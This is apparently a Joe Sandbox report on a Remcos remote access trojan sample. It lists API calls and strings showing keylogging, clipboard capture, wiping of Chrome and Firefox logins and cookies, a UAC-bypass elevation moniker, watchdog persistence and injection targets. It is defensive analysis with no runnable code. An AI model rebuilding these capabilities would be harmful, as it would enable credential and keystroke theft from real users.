                                                          • CloseHandle.KERNEL32 ref: 004053EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                          • API String ID: 3815868655-81343324
                                                          • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                          • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                          • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                          • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                          • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                            • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                            • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                            • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                          • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                          • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                          • API String ID: 65172268-860466531
                                                          • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                          • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                          • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                          • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                          • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                          • FindClose.KERNEL32(00000000), ref: 0040B517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                          • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                          • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                          • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                          • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                          • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                          • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                          • API String ID: 726551946-3025026198
                                                          • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                          • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                          • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                          • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 004159C7
                                                          • EmptyClipboard.USER32 ref: 004159D5
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                          • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                          • CloseClipboard.USER32 ref: 00415A5A
                                                          • OpenClipboard.USER32 ref: 00415A61
                                                          • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                          • CloseClipboard.USER32 ref: 00415A89
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID:
                                                          • API String ID: 3520204547-0
                                                          • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                          • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                          • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                          • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7
                                                          • API String ID: 0-3177665633
                                                          • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                          • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                          • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                          • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00409B3F
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                          • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                          • GetKeyState.USER32(00000010), ref: 00409B5C
                                                          • GetKeyboardState.USER32(?), ref: 00409B67
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID: 8[G
                                                          • API String ID: 1888522110-1691237782
                                                          • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                          • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                          • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                          • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00406788
                                                          • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                          • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                          • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                          • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                          • GetLastError.KERNEL32 ref: 00419935
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                          • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                          • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                          • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID: <D$<D$<D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                          • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                          • GetLastError.KERNEL32 ref: 00409A1B
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                          • TranslateMessage.USER32(?), ref: 00409A7A
                                                          • DispatchMessageA.USER32(?), ref: 00409A85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error $`#v
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: @CG$XCG$`HG$`HG$>G
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          APIs
                                                            • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                            • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                            • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                          • ExitProcess.KERNEL32 ref: 0040E672
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                          • GetLastError.KERNEL32 ref: 0040B261
                                                          Strings
                                                          • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                          • UserProfile, xrefs: 0040B227
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                          • GetLastError.KERNEL32 ref: 00416B02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004089AE
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                            • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                            • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                            • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                          • String ID:
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          APIs
                                                            • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                            • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                            • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                            • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                            • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: PowrProf.dll$SetSuspendState
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                          • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                          • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                          • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
